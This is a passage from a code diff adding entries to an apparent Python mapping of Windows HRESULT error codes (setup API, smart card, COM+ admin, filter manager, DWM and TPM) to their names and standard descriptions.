+ 0x800F0249: ("SPAPI_E_DRIVER_INSTALL_BLOCKED", "The installation of this driver is forbidden by system policy. Contact your system administrator."),
+ 0x800F024A: ("SPAPI_E_WRONG_INF_TYPE", "The specified INF is the wrong type for this operation."),
+ 0x800F024B: ("SPAPI_E_FILE_HASH_NOT_IN_CATALOG", "The hash for the file is not present in the specified catalog file. The file is likely corrupt or the victim of tampering."),
+ 0x800F024C: ("SPAPI_E_DRIVER_STORE_DELETE_FAILED", "A problem was encountered while attempting to delete the driver from the store."),
+ 0x800F0300: ("SPAPI_E_UNRECOVERABLE_STACK_OVERFLOW", "An unrecoverable stack overflow was encountered."),
+ 0x800F1000: ("SPAPI_E_ERROR_NOT_INSTALLED", "No installed components were detected."),
+ 0x80100001: ("SCARD_F_INTERNAL_ERROR", "An internal consistency check failed."),
+ 0x80100002: ("SCARD_E_CANCELLED", "The action was canceled by an SCardCancel request."),
+ 0x80100003: ("SCARD_E_INVALID_HANDLE", "The supplied handle was invalid."),
+ 0x80100004: ("SCARD_E_INVALID_PARAMETER", "One or more of the supplied parameters could not be properly interpreted."),
+ 0x80100005: ("SCARD_E_INVALID_TARGET", "Registry startup information is missing or invalid."),
+ 0x80100006: ("SCARD_E_NO_MEMORY", "Not enough memory available to complete this command."),
+ 0x80100007: ("SCARD_F_WAITED_TOO_LONG", "An internal consistency timer has expired."),
+ 0x80100008: ("SCARD_E_INSUFFICIENT_BUFFER", "The data buffer to receive returned data is too small for the returned data."),
+ 0x80100009: ("SCARD_E_UNKNOWN_READER", "The specified reader name is not recognized."),
+ 0x8010000A: ("SCARD_E_TIMEOUT", "The user-specified time-out value has expired."),
+ 0x8010000B: ("SCARD_E_SHARING_VIOLATION", "The smart card cannot be accessed because of other connections outstanding."),
+ 0x8010000C: ("SCARD_E_NO_SMARTCARD", "The operation requires a smart card, but no smart card is currently in the device."),
+ 0x8010000D: ("SCARD_E_UNKNOWN_CARD", "The specified smart card name is not recognized."),
+ 0x8010000E: ("SCARD_E_CANT_DISPOSE", "The system could not dispose of the media in the requested manner."),
+ 0x8010000F: ("SCARD_E_PROTO_MISMATCH", "The requested protocols are incompatible with the protocol currently in use with the smart card."),
+ 0x80100010: ("SCARD_E_NOT_READY", "The reader or smart card is not ready to accept commands."),
+ 0x80100011: ("SCARD_E_INVALID_VALUE", "One or more of the supplied parameters values could not be properly interpreted."),
+ 0x80100012: ("SCARD_E_SYSTEM_CANCELLED", "The action was canceled by the system, presumably to log off or shut down."),
+ 0x80100013: ("SCARD_F_COMM_ERROR", "An internal communications error has been detected."),
+ 0x80100014: ("SCARD_F_UNKNOWN_ERROR", "An internal error has been detected, but the source is unknown."),
+ 0x80100015: ("SCARD_E_INVALID_ATR", "An automatic terminal recognition (ATR) obtained from the registry is not a valid ATR string."),
+ 0x80100016: ("SCARD_E_NOT_TRANSACTED", "An attempt was made to end a nonexistent transaction."),
+ 0x80100017: ("SCARD_E_READER_UNAVAILABLE", "The specified reader is not currently available for use."),
+ 0x80100018: ("SCARD_P_SHUTDOWN", "The operation has been aborted to allow the server application to exit."),
+ 0x80100019: ("SCARD_E_PCI_TOO_SMALL", "The peripheral component interconnect (PCI) Receive buffer was too small."),
+ 0x8010001A: ("SCARD_E_READER_UNSUPPORTED", "The reader driver does not meet minimal requirements for support."),
+ 0x8010001B: ("SCARD_E_DUPLICATE_READER", "The reader driver did not produce a unique reader name."),
+ 0x8010001C: ("SCARD_E_CARD_UNSUPPORTED", "The smart card does not meet minimal requirements for support."),
+ 0x8010001D: ("SCARD_E_NO_SERVICE", "The smart card resource manager is not running."),
+ 0x8010001E: ("SCARD_E_SERVICE_STOPPED", "The smart card resource manager has shut down."),
+ 0x8010001F: ("SCARD_E_UNEXPECTED", "An unexpected card error has occurred."),
+ 0x80100020: ("SCARD_E_ICC_INSTALLATION", "No primary provider can be found for the smart card."),
+ 0x80100021: ("SCARD_E_ICC_CREATEORDER", "The requested order of object creation is not supported."),
+ 0x80100022: ("SCARD_E_UNSUPPORTED_FEATURE", "This smart card does not support the requested feature."),
+ 0x80100023: ("SCARD_E_DIR_NOT_FOUND", "The identified directory does not exist in the smart card."),
+ 0x80100024: ("SCARD_E_FILE_NOT_FOUND", "The identified file does not exist in the smart card."),
+ 0x80100025: ("SCARD_E_NO_DIR", "The supplied path does not represent a smart card directory."),
+ 0x80100026: ("SCARD_E_NO_FILE", "The supplied path does not represent a smart card file."),
+ 0x80100027: ("SCARD_E_NO_ACCESS", "Access is denied to this file."),
+ 0x80100028: ("SCARD_E_WRITE_TOO_MANY", "The smart card does not have enough memory to store the information."),
+ 0x80100029: ("SCARD_E_BAD_SEEK", "There was an error trying to set the smart card file object pointer."),
+ 0x8010002A: ("SCARD_E_INVALID_CHV", "The supplied PIN is incorrect."),
+ 0x8010002B: ("SCARD_E_UNKNOWN_RES_MNG", "An unrecognized error code was returned from a layered component."),
+ 0x8010002C: ("SCARD_E_NO_SUCH_CERTIFICATE", "The requested certificate does not exist."),
+ 0x8010002D: ("SCARD_E_CERTIFICATE_UNAVAILABLE", "The requested certificate could not be obtained."),
+ 0x8010002E: ("SCARD_E_NO_READERS_AVAILABLE", "Cannot find a smart card reader."),
+ 0x8010002F: ("SCARD_E_COMM_DATA_LOST", "A communications error with the smart card has been detected. Retry the operation."),
+ 0x80100030: ("SCARD_E_NO_KEY_CONTAINER", "The requested key container does not exist on the smart card."),
+ 0x80100031: ("SCARD_E_SERVER_TOO_BUSY", "The smart card resource manager is too busy to complete this operation."),
+ 0x80100065: ("SCARD_W_UNSUPPORTED_CARD", "The reader cannot communicate with the smart card, due to ATR configuration conflicts."),
+ 0x80100066: ("SCARD_W_UNRESPONSIVE_CARD", "The smart card is not responding to a reset."),
+ 0x80100067: ("SCARD_W_UNPOWERED_CARD", "Power has been removed from the smart card, so that further communication is not possible."),
+ 0x80100068: ("SCARD_W_RESET_CARD", "The smart card has been reset, so any shared state information is invalid."),
+ 0x80100069: ("SCARD_W_REMOVED_CARD", "The smart card has been removed, so that further communication is not possible."),
+ 0x8010006A: ("SCARD_W_SECURITY_VIOLATION", "Access was denied because of a security violation."),
+ 0x8010006B: ("SCARD_W_WRONG_CHV", "The card cannot be accessed because the wrong PIN was presented."),
+ 0x8010006C: ("SCARD_W_CHV_BLOCKED", "The card cannot be accessed because the maximum number of PIN entry attempts has been reached."),
+ 0x8010006D: ("SCARD_W_EOF", "The end of the smart card file has been reached."),
+ 0x8010006E: ("SCARD_W_CANCELLED_BY_USER", "The action was canceled by the user."),
+ 0x8010006F: ("SCARD_W_CARD_NOT_AUTHENTICATED", "No PIN was presented to the smart card."),
+ 0x80110401: ("COMADMIN_E_OBJECTERRORS", "Errors occurred accessing one or more objects-the ErrorInfo collection may have more detail."),
+ 0x80110402: ("COMADMIN_E_OBJECTINVALID", "One or more of the object's properties are missing or invalid."),
+ 0x80110403: ("COMADMIN_E_KEYMISSING", "The object was not found in the catalog."),
+ 0x80110404: ("COMADMIN_E_ALREADYINSTALLED", "The object is already registered."),
+ 0x80110407: ("COMADMIN_E_APP_FILE_WRITEFAIL", "An error occurred writing to the application file."),
+ 0x80110408: ("COMADMIN_E_APP_FILE_READFAIL", "An error occurred reading the application file."),
+ 0x80110409: ("COMADMIN_E_APP_FILE_VERSION", "Invalid version number in application file."),
+ 0x8011040A: ("COMADMIN_E_BADPATH", "The file path is invalid."),
+ 0x8011040B: ("COMADMIN_E_APPLICATIONEXISTS", "The application is already installed."),
+ 0x8011040C: ("COMADMIN_E_ROLEEXISTS", "The role already exists."),
+ 0x8011040D: ("COMADMIN_E_CANTCOPYFILE", "An error occurred copying the file."),
+ 0x8011040F: ("COMADMIN_E_NOUSER", "One or more users are not valid."),
+ 0x80110410: ("COMADMIN_E_INVALIDUSERIDS", "One or more users in the application file are not valid."),
+ 0x80110411: ("COMADMIN_E_NOREGISTRYCLSID", "The component's CLSID is missing or corrupt."),
+ 0x80110412: ("COMADMIN_E_BADREGISTRYPROGID", "The component's programmatic ID is missing or corrupt."),
+ 0x80110413: ("COMADMIN_E_AUTHENTICATIONLEVEL", "Unable to set required authentication level for update request."),
+ 0x80110414: ("COMADMIN_E_USERPASSWDNOTVALID", "The identity or password set on the application is not valid."),
+ 0x80110418: ("COMADMIN_E_CLSIDORIIDMISMATCH", "Application file CLSIDs or instance identifiers (IIDs) do not match corresponding DLLs."),
+ 0x80110419: ("COMADMIN_E_REMOTEINTERFACE", "Interface information is either missing or changed."),
+ 0x8011041A: ("COMADMIN_E_DLLREGISTERSERVER", "DllRegisterServer failed on component install."),
+ 0x8011041B: ("COMADMIN_E_NOSERVERSHARE", "No server file share available."),
+ 0x8011041D: ("COMADMIN_E_DLLLOADFAILED", "DLL could not be loaded."),
+ 0x8011041E: ("COMADMIN_E_BADREGISTRYLIBID", "The registered TypeLib ID is not valid."),
+ 0x8011041F: ("COMADMIN_E_APPDIRNOTFOUND", "Application install directory not found."),
+ 0x80110423: ("COMADMIN_E_REGISTRARFAILED", "Errors occurred while in the component registrar."),
+ 0x80110424: ("COMADMIN_E_COMPFILE_DOESNOTEXIST", "The file does not exist."),
+ 0x80110425: ("COMADMIN_E_COMPFILE_LOADDLLFAIL", "The DLL could not be loaded."),
+ 0x80110426: ("COMADMIN_E_COMPFILE_GETCLASSOBJ", "GetClassObject failed in the DLL."),
+ 0x80110427: ("COMADMIN_E_COMPFILE_CLASSNOTAVAIL", "The DLL does not support the components listed in the TypeLib."),
+ 0x80110428: ("COMADMIN_E_COMPFILE_BADTLB", "The TypeLib could not be loaded."),
+ 0x80110429: ("COMADMIN_E_COMPFILE_NOTINSTALLABLE", "The file does not contain components or component information."),
+ 0x8011042A: ("COMADMIN_E_NOTCHANGEABLE", "Changes to this object and its subobjects have been disabled."),
+ 0x8011042B: ("COMADMIN_E_NOTDELETEABLE", "The delete function has been disabled for this object."),
+ 0x8011042C: ("COMADMIN_E_SESSION", "The server catalog version is not supported."),
+ 0x8011042D: ("COMADMIN_E_COMP_MOVE_LOCKED", "The component move was disallowed because the source or destination application is either a system application or currently locked against changes."),
+ 0x8011042E: ("COMADMIN_E_COMP_MOVE_BAD_DEST", "The component move failed because the destination application no longer exists."),
+ 0x80110430: ("COMADMIN_E_REGISTERTLB", "The system was unable to register the TypeLib."),
+ 0x80110433: ("COMADMIN_E_SYSTEMAPP", "This operation cannot be performed on the system application."),
+ 0x80110434: ("COMADMIN_E_COMPFILE_NOREGISTRAR", "The component registrar referenced in this file is not available."),
+ 0x80110435: ("COMADMIN_E_COREQCOMPINSTALLED", "A component in the same DLL is already installed."),
+ 0x80110436: ("COMADMIN_E_SERVICENOTINSTALLED", "The service is not installed."),
+ 0x80110437: ("COMADMIN_E_PROPERTYSAVEFAILED", "One or more property settings are either invalid or in conflict with each other."),
+ 0x80110438: ("COMADMIN_E_OBJECTEXISTS", "The object you are attempting to add or rename already exists."),
+ 0x80110439: ("COMADMIN_E_COMPONENTEXISTS", "The component already exists."),
+ 0x8011043B: ("COMADMIN_E_REGFILE_CORRUPT", "The registration file is corrupt."),
+ 0x8011043C: ("COMADMIN_E_PROPERTY_OVERFLOW", "The property value is too large."),
+ 0x8011043E: ("COMADMIN_E_NOTINREGISTRY", "Object was not found in registry."),
+ 0x8011043F: ("COMADMIN_E_OBJECTNOTPOOLABLE", "This object cannot be pooled."),
+ 0x80110446: ("COMADMIN_E_APPLID_MATCHES_CLSID", "A CLSID with the same GUID as the new application ID is already installed on this machine."),
+ 0x80110447: ("COMADMIN_E_ROLE_DOES_NOT_EXIST", "A role assigned to a component, interface, or method did not exist in the application."),
+ 0x80110448: ("COMADMIN_E_START_APP_NEEDS_COMPONENTS", "You must have components in an application to start the application."),
+ 0x80110449: ("COMADMIN_E_REQUIRES_DIFFERENT_PLATFORM", "This operation is not enabled on this platform."),
+ 0x8011044A: ("COMADMIN_E_CAN_NOT_EXPORT_APP_PROXY", "Application proxy is not exportable."),
+ 0x8011044B: ("COMADMIN_E_CAN_NOT_START_APP", "Failed to start application because it is either a library application or an application proxy."),
+ 0x8011044C: ("COMADMIN_E_CAN_NOT_EXPORT_SYS_APP", "System application is not exportable."),
+ 0x8011044D: ("COMADMIN_E_CANT_SUBSCRIBE_TO_COMPONENT", "Cannot subscribe to this component (the component may have been imported)."),
+ 0x8011044E: ("COMADMIN_E_EVENTCLASS_CANT_BE_SUBSCRIBER", "An event class cannot also be a subscriber component."),
+ 0x8011044F: ("COMADMIN_E_LIB_APP_PROXY_INCOMPATIBLE", "Library applications and application proxies are incompatible."),
+ 0x80110450: ("COMADMIN_E_BASE_PARTITION_ONLY", "This function is valid for the base partition only."),
+ 0x80110451: ("COMADMIN_E_START_APP_DISABLED", "You cannot start an application that has been disabled."),
+ 0x80110457: ("COMADMIN_E_CAT_DUPLICATE_PARTITION_NAME", "The specified partition name is already in use on this computer."),
+ 0x80110458: ("COMADMIN_E_CAT_INVALID_PARTITION_NAME", "The specified partition name is invalid. Check that the name contains at least one visible character."),
+ 0x80110459: ("COMADMIN_E_CAT_PARTITION_IN_USE", "The partition cannot be deleted because it is the default partition for one or more users."),
+ 0x8011045A: ("COMADMIN_E_FILE_PARTITION_DUPLICATE_FILES", "The partition cannot be exported because one or more components in the partition have the same file name."),
+ 0x8011045B: ("COMADMIN_E_CAT_IMPORTED_COMPONENTS_NOT_ALLOWED", "Applications that contain one or more imported components cannot be installed into a nonbase partition."),
+ 0x8011045C: ("COMADMIN_E_AMBIGUOUS_APPLICATION_NAME", "The application name is not unique and cannot be resolved to an application ID."),
+ 0x8011045D: ("COMADMIN_E_AMBIGUOUS_PARTITION_NAME", "The partition name is not unique and cannot be resolved to a partition ID."),
+ 0x80110472: ("COMADMIN_E_REGDB_NOTINITIALIZED", "The COM+ registry database has not been initialized."),
+ 0x80110473: ("COMADMIN_E_REGDB_NOTOPEN", "The COM+ registry database is not open."),
+ 0x80110474: ("COMADMIN_E_REGDB_SYSTEMERR", "The COM+ registry database detected a system error."),
+ 0x80110475: ("COMADMIN_E_REGDB_ALREADYRUNNING", "The COM+ registry database is already running."),
+ 0x80110480: ("COMADMIN_E_MIG_VERSIONNOTSUPPORTED", "This version of the COM+ registry database cannot be migrated."),
+ 0x80110481: ("COMADMIN_E_MIG_SCHEMANOTFOUND", "The schema version to be migrated could not be found in the COM+ registry database."),
+ 0x80110482: ("COMADMIN_E_CAT_BITNESSMISMATCH", "There was a type mismatch between binaries."),
+ 0x80110483: ("COMADMIN_E_CAT_UNACCEPTABLEBITNESS", "A binary of unknown or invalid type was provided."),
+ 0x80110484: ("COMADMIN_E_CAT_WRONGAPPBITNESS", "There was a type mismatch between a binary and an application."),
+ 0x80110485: ("COMADMIN_E_CAT_PAUSE_RESUME_NOT_SUPPORTED", "The application cannot be paused or resumed."),
+ 0x80110486: ("COMADMIN_E_CAT_SERVERFAULT", "The COM+ catalog server threw an exception during execution."),
+ 0x80110600: ("COMQC_E_APPLICATION_NOT_QUEUED", "Only COM+ applications marked \"queued\" can be invoked using the \"queue\" moniker."),
+ 0x80110601: ("COMQC_E_NO_QUEUEABLE_INTERFACES", "At least one interface must be marked \"queued\" to create a queued component instance with the \"queue\" moniker."),
+ 0x80110602: ("COMQC_E_QUEUING_SERVICE_NOT_AVAILABLE", "Message Queuing is required for the requested operation and is not installed."),
+ 0x80110603: ("COMQC_E_NO_IPERSISTSTREAM", "Unable to marshal an interface that does not support IPersistStream."),
+ 0x80110604: ("COMQC_E_BAD_MESSAGE", "The message is improperly formatted or was damaged in transit."),
+ 0x80110605: ("COMQC_E_UNAUTHENTICATED", "An unauthenticated message was received by an application that accepts only authenticated messages."),
+ 0x80110606: ("COMQC_E_UNTRUSTED_ENQUEUER", "The message was requeued or moved by a user not in the QC Trusted User \"role\"."),
+ 0x80110701: ("MSDTC_E_DUPLICATE_RESOURCE", "Cannot create a duplicate resource of type Distributed Transaction Coordinator."),
+ 0x80110808: ("COMADMIN_E_OBJECT_PARENT_MISSING", "One of the objects being inserted or updated does not belong to a valid parent collection."),
+ 0x80110809: ("COMADMIN_E_OBJECT_DOES_NOT_EXIST", "One of the specified objects cannot be found."),
+ 0x8011080A: ("COMADMIN_E_APP_NOT_RUNNING", "The specified application is not currently running."),
+ 0x8011080B: ("COMADMIN_E_INVALID_PARTITION", "The partitions specified are not valid."),
+ 0x8011080D: ("COMADMIN_E_SVCAPP_NOT_POOLABLE_OR_RECYCLABLE", "COM+ applications that run as Windows NT service may not be pooled or recycled."),
+ 0x8011080E: ("COMADMIN_E_USER_IN_SET", "One or more users are already assigned to a local partition set."),
+ 0x8011080F: ("COMADMIN_E_CANTRECYCLELIBRARYAPPS", "Library applications may not be recycled."),
+ 0x80110811: ("COMADMIN_E_CANTRECYCLESERVICEAPPS", "Applications running as Windows NT services may not be recycled."),
+ 0x80110812: ("COMADMIN_E_PROCESSALREADYRECYCLED", "The process has already been recycled."),
+ 0x80110813: ("COMADMIN_E_PAUSEDPROCESSMAYNOTBERECYCLED", "A paused process may not be recycled."),
+ 0x80110814: ("COMADMIN_E_CANTMAKEINPROCSERVICE", "Library applications may not be Windows NT services."),
+ 0x80110815: ("COMADMIN_E_PROGIDINUSEBYCLSID", "The ProgID provided to the copy operation is invalid. The ProgID is in use by another registered CLSID."),
+ 0x80110816: ("COMADMIN_E_DEFAULT_PARTITION_NOT_IN_SET", "The partition specified as the default is not a member of the partition set."),
+ 0x80110817: ("COMADMIN_E_RECYCLEDPROCESSMAYNOTBEPAUSED", "A recycled process may not be paused."),
+ 0x80110818: ("COMADMIN_E_PARTITION_ACCESSDENIED", "Access to the specified partition is denied."),
+ 0x80110819: ("COMADMIN_E_PARTITION_MSI_ONLY", "Only application files (*.msi files) can be installed into partitions."),
+ 0x8011081A: ("COMADMIN_E_LEGACYCOMPS_NOT_ALLOWED_IN_1_0_FORMAT", "Applications containing one or more legacy components may not be exported to 1.0 format."),
+ 0x8011081B: ("COMADMIN_E_LEGACYCOMPS_NOT_ALLOWED_IN_NONBASE_PARTITIONS", "Legacy components may not exist in nonbase partitions."),
+ 0x8011081C: ("COMADMIN_E_COMP_MOVE_SOURCE", "A component cannot be moved (or copied) from the System Application, an application proxy, or a nonchangeable application."),
+ 0x8011081D: ("COMADMIN_E_COMP_MOVE_DEST", "A component cannot be moved (or copied) to the System Application, an application proxy or a nonchangeable application."),
+ 0x8011081E: ("COMADMIN_E_COMP_MOVE_PRIVATE", "A private component cannot be moved (or copied) to a library application or to the base partition."),
+ 0x8011081F: ("COMADMIN_E_BASEPARTITION_REQUIRED_IN_SET", "The Base Application Partition exists in all partition sets and cannot be removed."),
+ 0x80110820: ("COMADMIN_E_CANNOT_ALIAS_EVENTCLASS", "Alas, Event Class components cannot be aliased."),
+ 0x80110821: ("COMADMIN_E_PRIVATE_ACCESSDENIED", "Access is denied because the component is private."),
+ 0x80110822: ("COMADMIN_E_SAFERINVALID", "The specified SAFER level is invalid."),
+ 0x80110823: ("COMADMIN_E_REGISTRY_ACCESSDENIED", "The specified user cannot write to the system registry."),
+ 0x80110824: ("COMADMIN_E_PARTITIONS_DISABLED", "COM+ partitions are currently disabled."),
+ 0x801F0001: ("ERROR_FLT_NO_HANDLER_DEFINED", "A handler was not defined by the filter for this operation."),
+ 0x801F0002: ("ERROR_FLT_CONTEXT_ALREADY_DEFINED", "A context is already defined for this object."),
+ 0x801F0003: ("ERROR_FLT_INVALID_ASYNCHRONOUS_REQUEST", "Asynchronous requests are not valid for this operation."),
+ 0x801F0004: ("ERROR_FLT_DISALLOW_FAST_IO", "Disallow the Fast IO path for this operation."),
+ 0x801F0005: ("ERROR_FLT_INVALID_NAME_REQUEST", "An invalid name request was made. The name requested cannot be retrieved at this time."),
+ 0x801F0006: ("ERROR_FLT_NOT_SAFE_TO_POST_OPERATION", "Posting this operation to a worker thread for further processing is not safe at this time because it could lead to a system deadlock."),
+ 0x801F0007: ("ERROR_FLT_NOT_INITIALIZED", "The Filter Manager was not initialized when a filter tried to register. Be sure that the Filter Manager is being loaded as a driver."),
+ 0x801F0008: ("ERROR_FLT_FILTER_NOT_READY", "The filter is not ready for attachment to volumes because it has not finished initializing (FltStartFiltering has not been called)."),
+ 0x801F0009: ("ERROR_FLT_POST_OPERATION_CLEANUP", "The filter must clean up any operation-specific context at this time because it is being removed from the system before the operation is completed by the lower drivers."),
+ 0x801F000A: ("ERROR_FLT_INTERNAL_ERROR", "The Filter Manager had an internal error from which it cannot recover; therefore, the operation has been failed. This is usually the result of a filter returning an invalid value from a preoperation callback."),
+ 0x801F000B: ("ERROR_FLT_DELETING_OBJECT", "The object specified for this action is in the process of being deleted; therefore, the action requested cannot be completed at this time."),
+ 0x801F000C: ("ERROR_FLT_MUST_BE_NONPAGED_POOL", "Nonpaged pool must be used for this type of context."),
+ 0x801F000D: ("ERROR_FLT_DUPLICATE_ENTRY", "A duplicate handler definition has been provided for an operation."),
+ 0x801F000E: ("ERROR_FLT_CBDQ_DISABLED", "The callback data queue has been disabled."),
+ 0x801F000F: ("ERROR_FLT_DO_NOT_ATTACH", "Do not attach the filter to the volume at this time."),
+ 0x801F0010: ("ERROR_FLT_DO_NOT_DETACH", "Do not detach the filter from the volume at this time."),
+ 0x801F0011: ("ERROR_FLT_INSTANCE_ALTITUDE_COLLISION", "An instance already exists at this altitude on the volume specified."),
+ 0x801F0012: ("ERROR_FLT_INSTANCE_NAME_COLLISION", "An instance already exists with this name on the volume specified."),
+ 0x801F0013: ("ERROR_FLT_FILTER_NOT_FOUND", "The system could not find the filter specified."),
+ 0x801F0014: ("ERROR_FLT_VOLUME_NOT_FOUND", "The system could not find the volume specified."),
+ 0x801F0015: ("ERROR_FLT_INSTANCE_NOT_FOUND", "The system could not find the instance specified."),
+ 0x801F0016: ("ERROR_FLT_CONTEXT_ALLOCATION_NOT_FOUND", "No registered context allocation definition was found for the given request."),
+ 0x801F0017: ("ERROR_FLT_INVALID_CONTEXT_REGISTRATION", "An invalid parameter was specified during context registration."),
+ 0x801F0018: ("ERROR_FLT_NAME_CACHE_MISS", "The name requested was not found in the Filter Manager name cache and could not be retrieved from the file system."),
+ 0x801F0019: ("ERROR_FLT_NO_DEVICE_OBJECT", "The requested device object does not exist for the given volume."),
+ 0x801F001A: ("ERROR_FLT_VOLUME_ALREADY_MOUNTED", "The specified volume is already mounted."),
+ 0x801F001B: ("ERROR_FLT_ALREADY_ENLISTED", "The specified Transaction Context is already enlisted in a transaction."),
+ 0x801F001C: ("ERROR_FLT_CONTEXT_ALREADY_LINKED", "The specified context is already attached to another object."),
+ 0x801F0020: ("ERROR_FLT_NO_WAITER_FOR_REPLY", "No waiter is present for the filter's reply to this message."),
+ 0x80260001: ("ERROR_HUNG_DISPLAY_DRIVER_THREAD", "{Display Driver Stopped Responding} The %hs display driver has stopped working normally. Save your work and reboot the system to restore full display functionality. The next time you reboot the machine a dialog will be displayed giving you a chance to report this failure to Microsoft."),
+ 0x80261001: ("ERROR_MONITOR_NO_DESCRIPTOR", "Monitor descriptor could not be obtained."),
+ 0x80261002: ("ERROR_MONITOR_UNKNOWN_DESCRIPTOR_FORMAT", "Format of the obtained monitor descriptor is not supported by this release."),
+ 0x80263001: ("DWM_E_COMPOSITIONDISABLED", "{Desktop Composition is Disabled} The operation could not be completed because desktop composition is disabled."),
+ 0x80263002: ("DWM_E_REMOTING_NOT_SUPPORTED", "{Some Desktop Composition APIs Are Not Supported While Remoting} Some desktop composition APIs are not supported while remoting. The operation is not supported while running in a remote session."),
+ 0x80263003: ("DWM_E_NO_REDIRECTION_SURFACE_AVAILABLE", "{No DWM Redirection Surface is Available} The Desktop Window Manager (DWM) was unable to provide a redirection surface to complete the DirectX present."),
+ 0x80263004: ("DWM_E_NOT_QUEUING_PRESENTS", "{DWM Is Not Queuing Presents for the Specified Window} The window specified is not currently using queued presents."),
+ 0x80280000: ("TPM_E_ERROR_MASK", "This is an error mask to convert Trusted Platform Module (TPM) hardware errors to Win32 errors."),
+ 0x80280001: ("TPM_E_AUTHFAIL", "Authentication failed."),
+ 0x80280002: ("TPM_E_BADINDEX", "The index to a Platform Configuration Register (PCR), DIR, or other register is incorrect."),
+ 0x80280003: ("TPM_E_BAD_PARAMETER", "One or more parameters are bad."),
+ 0x80280004: ("TPM_E_AUDITFAILURE", "An operation completed successfully but the auditing of that operation failed."),
+ 0x80280005: ("TPM_E_CLEAR_DISABLED", "The clear disable flag is set and all clear operations now require physical access."),
+ 0x80280006: ("TPM_E_DEACTIVATED", "The TPM is deactivated."),
+ 0x80280007: ("TPM_E_DISABLED", "The TPM is disabled."),
+ 0x80280008: ("TPM_E_DISABLED_CMD", "The target command has been disabled."),
+ 0x80280009: ("TPM_E_FAIL", "The operation failed."),
+ 0x8028000A: ("TPM_E_BAD_ORDINAL", "The ordinal was unknown or inconsistent."),
+ 0x8028000B: ("TPM_E_INSTALL_DISABLED", "The ability to install an owner is disabled."),
+ 0x8028000C: ("TPM_E_INVALID_KEYHANDLE", "The key handle cannot be interpreted."),
+ 0x8028000D: ("TPM_E_KEYNOTFOUND", "The key handle points to an invalid key."),
+ 0x8028000E: ("TPM_E_INAPPROPRIATE_ENC", "Unacceptable encryption scheme."),
+ 0x8028000F: ("TPM_E_MIGRATEFAIL", "Migration authorization failed."),
+ 0x80280010: ("TPM_E_INVALID_PCR_INFO", "PCR information could not be interpreted."),
+ 0x80280011: ("TPM_E_NOSPACE", "No room to load key."),
+ 0x80280012: ("TPM_E_NOSRK", "There is no storage root key (SRK) set."),
+ 0x80280013: ("TPM_E_NOTSEALED_BLOB", "An encrypted blob is invalid or was not created by this TPM."),
+ 0x80280014: ("TPM_E_OWNER_SET", "There is already an owner."),
+ 0x80280015: ("TPM_E_RESOURCES", "The TPM has insufficient internal resources to perform the requested action."),
+ 0x80280016: ("TPM_E_SHORTRANDOM", "A random string was too short."),
+ 0x80280017: ("TPM_E_SIZE", "The TPM does not have the space to perform the operation."),
+ 0x80280018: ("TPM_E_WRONGPCRVAL", "The named PCR value does not match the current PCR value."),
+ 0x80280019: ("TPM_E_BAD_PARAM_SIZE", "The paramSize argument to the command has the incorrect value."),
+ 0x8028001A: ("TPM_E_SHA_THREAD", "There is no existing SHA-1 thread."),
+ 0x8028001B: ("TPM_E_SHA_ERROR", "The calculation is unable to proceed because the existing SHA-1 thread has already encountered an error."),
+ 0x8028001C: ("TPM_E_FAILEDSELFTEST", "Self-test has failed and the TPM has shut down."),
+ 0x8028001D: ("TPM_E_AUTH2FAIL", "The authorization for the second key in a two-key function failed authorization."),
+ 0x8028001E: ("TPM_E_BADTAG", "The tag value sent to for a command is invalid."),
+ 0x8028001F: ("TPM_E_IOERROR", "An I/O error occurred transmitting information to the TPM."),
+ 0x80280020: ("TPM_E_ENCRYPT_ERROR", "The encryption process had a problem."),
+ 0x80280021: ("TPM_E_DECRYPT_ERROR", "The decryption process did not complete."),
+ 0x80280022: ("TPM_E_INVALID_AUTHHANDLE", "An invalid handle was used."),
+ 0x80280023: ("TPM_E_NO_ENDORSEMENT", "The TPM does not have an endorsement key (EK) installed."),
+ 0x80280024: ("TPM_E_INVALID_KEYUSAGE", "The usage of a key is not allowed."),
+ 0x80280025: ("TPM_E_WRONG_ENTITYTYPE", "The submitted entity type is not allowed."),
+ 0x80280026: ("TPM_E_INVALID_POSTINIT", "The command was received in the wrong sequence relative to TPM_Init and a subsequent TPM_Startup."),
+ 0x80280027: ("TPM_E_INAPPROPRIATE_SIG", "Signed data cannot include additional DER information."),
+ 0x80280028: ("TPM_E_BAD_KEY_PROPERTY", "The key properties in TPM_KEY_PARMs are not supported by this TPM."),
+ 0x80280029: ("TPM_E_BAD_MIGRATION", "The migration properties of this key are incorrect."),
+ 0x8028002A: ("TPM_E_BAD_SCHEME", "The signature or encryption scheme for this key is incorrect or not permitted in this situation."),
+ 0x8028002B: ("TPM_E_BAD_DATASIZE", "The size of the data (or blob) parameter is bad or inconsistent with the referenced key."),
+ 0x8028002C: ("TPM_E_BAD_MODE", "A mode parameter is bad, such as capArea or subCapArea for TPM_GetCapability, physicalPresence parameter for TPM_PhysicalPresence, or migrationType for TPM_CreateMigrationBlob."),
+ 0x8028002D: ("TPM_E_BAD_PRESENCE", "Either the physicalPresence or physicalPresenceLock bits have the wrong value."),
+ 0x8028002E: ("TPM_E_BAD_VERSION", "The TPM cannot perform this version of the capability."),
+ 0x8028002F: ("TPM_E_NO_WRAP_TRANSPORT", "The TPM does not allow for wrapped transport sessions."),
+ 0x80280030: ("TPM_E_AUDITFAIL_UNSUCCESSFUL", "TPM audit construction failed and the underlying command was returning a failure code also."),
+ 0x80280031: ("TPM_E_AUDITFAIL_SUCCESSFUL", "TPM audit construction failed and the underlying command was returning success."),
+ 0x80280032: ("TPM_E_NOTRESETABLE", "Attempt to reset a PCR that does not have the resettable attribute."),
+ 0x80280033: ("TPM_E_NOTLOCAL", "Attempt to reset a PCR register that requires locality and the locality modifier not part of command transport."),
+ 0x80280034: ("TPM_E_BAD_TYPE", "Make identity blob not properly typed."),
+ 0x80280035: ("TPM_E_INVALID_RESOURCE", "When saving context identified resource type does not match actual resource."),
+ 0x80280036: ("TPM_E_NOTFIPS", "The TPM is attempting to execute a command only available when in Federal Information Processing Standards (FIPS) mode."),
+ 0x80280037: ("TPM_E_INVALID_FAMILY", "The command is attempting to use an invalid family ID."),
+ 0x80280038: ("TPM_E_NO_NV_PERMISSION", "The permission to manipulate the NV storage is not available."),
+ 0x80280039: ("TPM_E_REQUIRES_SIGN", "The operation requires a signed command."),
+ 0x8028003A: ("TPM_E_KEY_NOTSUPPORTED", "Wrong operation to load an NV key."),
+ 0x8028003B: ("TPM_E_AUTH_CONFLICT", "NV_LoadKey blob requires both owner and blob authorization."),
